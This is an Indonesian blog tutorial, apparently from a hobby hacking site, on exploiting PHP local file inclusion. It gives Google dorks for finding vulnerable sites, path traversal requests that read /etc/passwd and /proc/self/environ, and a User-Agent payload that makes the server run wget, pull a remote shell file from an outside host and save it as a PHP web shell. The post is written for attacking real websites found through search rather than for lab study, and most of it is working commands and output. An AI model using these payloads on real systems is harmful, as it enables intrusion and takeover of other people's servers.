Open top menu
Tuesday, April 28, 2015

Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.

Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.



Google Dorks :

inurl:/view/lang/index.php?page=?page=

inurl:/shared/help.php?page=



Use your brain , bitch !

Saya anggep sudah dapat site vuln nya.

Pertama, test basic apa web tersebut vuln LFI.

localhost/view.php?page=email.php

Coba ganti email.php dengan ../../

localhost/view.php?page=../../



Jika kalian dapat error seperti

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337



Viola ! :D Ada kesempatan untuk membuka localfile yang lebih sensitif :D

Kita coba panggil file /etc/passwd nya .

localhost/view.php?page=etc/passwd

Masih error ?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337



 Kita coba naikkan direktori nya.

localhost/view.php?page=../../../../../etc/passwd

Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin



.... dsb :p





Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.

localhost/view.php?page=../../../../../proc/self/environ



DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,

application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,

image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac

HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd

HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15

PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron

REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337

REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron

SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php

SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost

SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k

PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80



Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.

Langkah selanjutnya, aktifkan tamper data.

Load halaman localhost/view.php?page=../../../../../proc/self/environ

Lalu tamper.

pada user-agent di addons tamper data tadi isi dengan

<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>

Lalu submit.



Shell kalian akan terletak di

localhost/fvck.php



Sekian tutor kali ini semoga bermanfaat.
Tagged
Different Themes
Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

0 comments

Subscribe to: Post Comments (Atom)